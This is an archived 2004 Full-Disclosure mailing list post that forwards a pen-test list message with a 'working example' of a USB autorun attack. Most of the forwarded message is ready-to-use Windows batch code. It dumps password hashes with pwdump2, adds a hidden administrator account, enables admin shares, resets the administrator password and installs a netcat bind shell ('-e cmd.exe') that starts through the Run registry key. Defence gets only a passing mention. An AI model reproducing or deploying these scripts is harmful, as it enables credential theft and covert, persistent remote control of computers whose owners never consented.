[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-Disclosure] USB risks - working autorun example (fwd from pen-test)

To: bugtraq@xxxxxxxxxxxxxxxxx, full-disclosure@xxxxxxxxxxxxxxxx
Subject: [Full-Disclosure] USB risks - working autorun example (fwd from pen-test)
From: Gadi Evron <ge@xxxxxxxxxxxxxxxxxxxxxxxxxxxxx>
Date: Sat, 19 Jun 2004 14:56:16 +0200

Okay, just to put this point at ease, autorun.inf usage on USB drives is possible. My concerns are of a different type, a BOF or a backdoor in an SDK. Even simple usage of USB for different operational criminal needs... Still, if the simplest solution (autorun) works (and it does...)... why over-complicate like we in the security field tend to do?

Attached is a proof-of-concept as made available by mak_pen@xxxxxxxxxxx for using autorun with USB.

This should work. As it was already released, I see nothing wrong with relaying it again (with due credit) here.

I'd strongly suggest to people to read the (different) threads on the subject on the pen-test list, a lot of questions were answered there.

Gadi Evron.

--
Email: ge@xxxxxxxxxxxxx  Work: gadie@xxxxxxxxxxx Backup: ge@xxxxxxxxxxx
Phone: +972-50-428610 (Cell).

PGP key for attachments: http://vapid.reprehensible.net/~ge/Gadi_Evron.asc ID: 0xD9216A06 FP: 5BB0 D3E2 D3C1 19B7 2104 C0D0 A7B3 1CF7 D921 6A06 GPG key for encrypted email: http://vapid.reprehensible.net/~ge/Gadi_Evron_Emails.asc ID: 0x06C7D450 FP: 3B88 845A DF1F 4062 E5BA 569A A87E 8DB7 06C7 D450

--- Begin Message ---

To: pen-test@xxxxxxxxxxxxxxxxx
Subject: Re: USB delivered attacks (working example)
From: <mak_pen@xxxxxxxxxxx>
Date: 3 Jun 2004 15:03:11 -0000

In-Reply-To: <BAY15-F11d7KKQpQq5p00043ca6@xxxxxxxxxxx>

I have been using this "attack" for some time now. below are the batch files 
(test.bat, b.bat and autorun.inf. autorun.inf calls test.bat)i use:



*********<BOF test.bat>

@echo off

@start /min b.bat /B

@exit

<EOF test.bat>





*********<BOF b.bat>

@explorer .

@echo off



::Displaying Computer Information for my reference

@echo %computername% %username% %date% %time% >> Essential\DumpIt\sam.txt

@Essential\DumpIt\pwdump2 >> Essential\DumpIt\sam.txt



::Adding a user for me :o)

@net user /add __system32__ .z,xmcnvb /fullname:"IPC User" 

@net localgroup Administrators _system32_ /add



::Hide the Account from being shown on the welcome screen

@reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows 
NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "__system__" /t 
REG_DWORD /d 0 /f



::Enabling Admin Shares

@reg add 
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters /v 
@AutoSharewks /t reg_dword /d 1 /f



::Changing Admin Password

@net user administrator .;[pl,mkoijnbhu



::Backdooring

@copy nc.exe <nc directory>

@cd c:

@cd <nc directory>

@reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v 
"Taskbr" /d "nc directory\nc.exe -L -d -p 80 -e cmd.exe" /f



@echo MYUSER: __system32__ .z,xmcnvb >> Essential\DumpIt\sam.txt

@echo Changed Admin Pass: .;[pl,mkoijnbhu >> Essential\DumpIt\sam.txt

@echo ******************************************** >> Essential\DumpIt\sam.txt

@cls

@exit

<EOF b.bat>



I have tried this using a flash memmory  and it works. what happens is that it 
opens explorer showing the current directory so that it hides any shells that 
might appear, then it does a series of commands which i have documented above.



to prevent against this i have a registry file i use to disable autorun all 
together. contact me if you need it at: mak_pen(at)hotmail(dot)com



Cheers....





>Received: (qmail 20035 invoked from network); 2 Jun 2004 22:23:41 -0000

>Received: from outgoing.securityfocus.com (HELO outgoing2.securityfocus.com) 
>(205.206.231.26)

>  by mail.securityfocus.com with SMTP; 2 Jun 2004 22:23:41 -0000

>Received: from lists.securityfocus.com (lists.securityfocus.com 
>[205.206.231.19])

>       by outgoing2.securityfocus.com (Postfix) with QMQP

>       id 62E8414370A; Thu,  3 Jun 2004 00:26:35 -0600 (MDT)

>Mailing-List: contact pen-test-help@xxxxxxxxxxxxxxxxx; run by ezmlm

>Precedence: bulk

>List-Id: <pen-test.list-id.securityfocus.com>

>List-Post: <mailto:pen-test@xxxxxxxxxxxxxxxxx>

>List-Help: <mailto:pen-test-help@xxxxxxxxxxxxxxxxx>

>List-Unsubscribe: <mailto:pen-test-unsubscribe@xxxxxxxxxxxxxxxxx>

>List-Subscribe: <mailto:pen-test-subscribe@xxxxxxxxxxxxxxxxx>

>Delivered-To: mailing list pen-test@xxxxxxxxxxxxxxxxx

>Delivered-To: moderator for pen-test@xxxxxxxxxxxxxxxxx

>Received: (qmail 27926 invoked from network); 2 Jun 2004 19:49:38 -0000

>X-Originating-IP: [66.130.148.65]

>X-Originating-Email: [mindedsmasher@xxxxxxxxxxx]

>X-Sender: mindedsmasher@xxxxxxxxxxx

>From: "Fred Gravel" <mindedsmasher@xxxxxxxxxxx>

>To: pen-test@xxxxxxxxxxxxxxxxx

>Subject: Re: USB delivered attacks

>Date: Wed, 02 Jun 2004 20:02:14 +0000

>Mime-Version: 1.0

>Content-Type: text/plain; format=flowed

>Message-ID: <BAY15-F11d7KKQpQq5p00043ca6@xxxxxxxxxxx>

>X-OriginalArrivalTime: 02 Jun 2004 20:02:14.0500 (UTC) 
>FILETIME=[7FA8F240:01C448DC]

>

>And after some search ... autorun is possible on a usb storage device... as 

>it explained just below ...

>

>http://www.microsoft.com/whdc/device/storage/usbfaq.mspx

>Q: What must I do to trigger Autorun on my USB storage device?

>If you need to make a USB storage device that executes Autorun, the 

>following two conditions must both be true:

>?

>

>Media must be marked as removable.

>?

>

>The device can be set to either static or removable.

>

>We associate the "removable" nature of a device with the bus that it resides 

>on. This means that a disk on an Integrated Device Electronics (IDE) or SCSI 

>bus would be considered fixed, whereas a disk on a USB or IEEE 1394 bus 

>would be regarded as removable by default. PnP uses a bit in the 

>DEVICE_CAPABILITIES structure to determine this. For more information, see 

>the DEVICE_CAPABILITIES Plug and Play Structure in the Windows DDK, located 

>at 

>http://msdn.microsoft.com/library/default.asp?url=/library/en-us/kmarch/hh/kmarch/k112_22r6.asp.

>

>The "removable" nature of media is a property of the device. For example, in 

>the case of a CD-ROM or a ZIP drive, the medium can be removed without the 

>device itself going away, but on the other hand the medium and the disk 

>cannot be separated on static storage PC cards. We obtain this information 

>by using the StorageDeviceProperty request. For more information, see the 

>STORAGE_DEVICE_DESCRIPTOR Storage Structure in the Windows DDK, located at 

>http://msdn.microsoft.com/library/en-us/storage/hh/storage/k306_00qa.asp.

>

>

>----

>Also the autorun could be used in "cooperation" of the desktop.ini file 

>included in the folder(s) on the usb storage device if needed...

>

>_________________________________________________________________

>MSN Toolbar provides one-click access to Hotmail from any Web page ? FREE 

>download! http://toolbar.msn.click-url.com/go/onm00200413ave/direct/01/

>

>

--- End Message ---

Follow-Ups:
- Re: [Full-Disclosure] USB risks - working autorun example (fwd from pen-test)
  - From: Harlan Carvey
- [Full-Disclosure] server administration
  - From: harry

Prev by Date: Re: [Full-Disclosure] Re: USB risks (continued)
Next by Date: Re: [Full-Disclosure] Re: USB risks (continued)
Previous by thread: [Full-Disclosure] [SECURITY] [DSA 521-1] New sup packages fix format string vulnerabilities
Next by thread: Re: [Full-Disclosure] USB risks - working autorun example (fwd from pen-test)
Index(es):
- Date
- Thread